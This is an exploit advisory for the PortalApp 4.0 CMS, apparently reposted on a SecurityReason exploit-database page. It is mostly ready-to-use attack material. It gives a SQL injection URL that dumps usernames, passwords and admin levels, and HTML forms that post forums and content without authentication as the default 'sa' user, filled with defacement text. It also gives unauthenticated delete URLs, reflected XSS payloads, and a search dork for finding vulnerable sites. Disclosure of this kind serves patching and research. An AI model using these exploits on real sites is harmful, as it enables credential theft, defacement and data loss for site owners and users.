PortalApp 4.0 (SQL/XSS/Auth Bypasses) Multiple Remote Vulnerabilities

Advisory Content :

###########################################################################
###
#Title: PortalApp 4.0 Multiple vulnerabilities
#
#
#
#Discovered By: r3dm0v3
#
# http://r3dm0v3.persianblog.ir
#
# r3dm0v3( 4t }yahoo[dot}com
#
# Tehran - Iran
#
#
#
#Vendor: http://www.portalapp.com
#
#Vulnerable Version: 4.0, prior versions maybe vulnerable
#
#Remote Exploit: Yes
#
#Dork: "Copyright @2007 Iatek LLC"
#
#Fix: Not Available
#
###########################################################################
###

###########################################################################
###
# SQL Injection (CRITICAL)
#
###########################################################################
###
#Description:
PortalApp is a Content Management System (CMS) for websites.
Bug: The user input 'sortby' is directly used in query statement!

#Exploit:
http://site.com/forums.asp?keywords=r3dm0v3&do_search=1&sortby=users.user_n
ame+UNION+SELECT+1,2,3,4,5,password,user_name,8,9,10,user_id,accesslevel,13
,14,15+FROM+Users

author will be usernames
topic will be passwords
replies will be username IDs
views will be access levels (5 is super admin)

###########################################################################
###
# Following actions in 'forum.asp' can take done without any
authentication. #
###########################################################################
###
create a forum:
<html>
<form
action=http://site.com/forums.asp?action=insert_level1_edit_disc_forums
method=post>
userid:<input type=text name=user_id value=255>by default 255 is sa<br>
ForumName:<input type=text name=ForumName value="H4c|<3d bY r3dm0v3"><br>
Description:<input type=text name=Description value="r3dm0v3 was here. <a
href=http://r3dm0v3.persianblog.ir>http://r3dm0v3.persianblog.ir</a>"><br>
ForumSection:<input type=text name=ForumSection value="Hacked"><br>
DisplayOrder:<input type=text name=DisplayOrder value=1><br>
<input type=submit>
</form>
</html>

create a topic:
<html>
<form
action=http://site.com/forums.asp?action=insert_level2_edit_disc_topics
method=post>
userid:<input type=text name=user_id value=255>by default 255 is sa<br>
ForumID:<input type=text name=ForumId value=><br>
Subject:<input type=text name=Subject value="r3dm0v3."><br>
Message:<br><textarea rows=3 cols=50 name=Message>r3dm0v3 was
here.</textarea><br>
Icon:<input type=text name=Icon value=14><br>
Show Signature:<input type=text name=Showsignature value=0><br>
Notify:<input type=text name=Notify ><br>
Locked:<input type=text name=Locked value=1><br>
Sticky:<input type=text name=Sticky ><br>
Date:<input type=text name=DateAdded value="6/1/2008"><br>
DateLast:<input type=text name=DateLast value="6/1/2008"><br>
<input type=submit>
</form>
</html>

delete a forum:
http://site.com/forums.asp?action=delete_level1_edit_disc_forums&ForumId=[F
orumID]
delete a topic:
http://site.com/forums.asp?action=delete_level2_edit_disc_topics&TopicId=[T
opicID]
delete a reply:
http://site.com/forums.asp?action=delete_level3_edit_disc_replies&ReplyId=[
ReplyID]
delete a topic reply:
http://site.com/forums.asp?action=delete_level2_disc_replies&TopicId=[Topic
ID]&ReplyId=[ReplyID]

#There some other actions:
insert_level3_edit_disc_replies
insert_detail_disc_topics
update_level1_edit_disc_forums
update_level2_edit_disc_topics
update_level3_edit_disc_replies
update_detail_disc_topics
update_level2_disc_replies

###########################################################################
###
#Following actions in 'Content.asp' can take done without any
authentication.#
###########################################################################
###
Add content:
<html>
<form action=http://site.com/content.asp?action=insert_detail_default
method=post>
userid:<input type=text name=user_id value=255>by default 255 is sa<br>
ContentTypeID:<input type=text name=ContentTypeID
value=2>1:general(company) 2:article 3:lin 4:news 5:announcement 6:download
7:gallery 8:faq ...<br>
catID:<input type=text name=CatID value=198><br>
Date:<input type=text name=DateAdded value="6/1/2008"><br>
Author:<input type=text name=Author value=r3dm0v3><br>
title:<input type=text name=Title value="h4ck3d bY r3dm0v3"><br>
ShortDesc:<br><textarea rows=3 cols=50 name=ShortDesc>r3dm0v3 was
here.</textarea><br>
LongDesc:<br><textarea rows=4 cols=50 name=LongDesc>r3dm0v3 was here.
http://r3dm0v3.persianblog.ir</textarea><br>
relatedULR<input type=text name=RelatedURL
value="http://r3dm0v3.persianblog.ir"><br>
DownloadURL:<input type=text name=DownloadURL><br>
Filename:<input type=text name=Filename><br>
Thumbnail:<input type=text name=Thumbnail><br>
Image1:<input type=text name=Image1><br>
PrevContentID:<input type=text name=PrevContentId><br>
NextContentID:<input type=text name=NextContentId><br>
views:<input type=text name=Impressions value=10000><br>
AVGRating:<input type=text name=AvgRating value=10000><br>
<input type=submit>
</form>
</html>

'insert_detail_content' is also vulnerable. Use above html code for
exploit

###########################################################################
###
# XSS
#
###########################################################################
###
http://site.com/forums.asp?keywords=%27%3E%3Cscript%3Ealert%28%27XSS%27%29%
3C%2Fscript%3E&do_search=1
http://site.com/content.asp?ContentType=General&keywords=%27%3E%3Cscript%3E
alert%28%27XSS%27%29%3C%2Fscript%3E&do_search=1

Security

IT News

Search

SecurityAlert Database

About SecurityAlert

ExploitAlert Database

SecurityReason Research

WLB Database

Send to WLB

About WLB

Security Audit

Schedule

Prices of services

Contact

SecurityReason IT News

SecurityAlert

World Laboratory of Bugtraq

ExploitAlert

Apache

PHP

Contact

About SecurityReason

PortalApp 4.0 (SQL/XSS/Auth Bypasses) Multiple Remote Vulnerabilities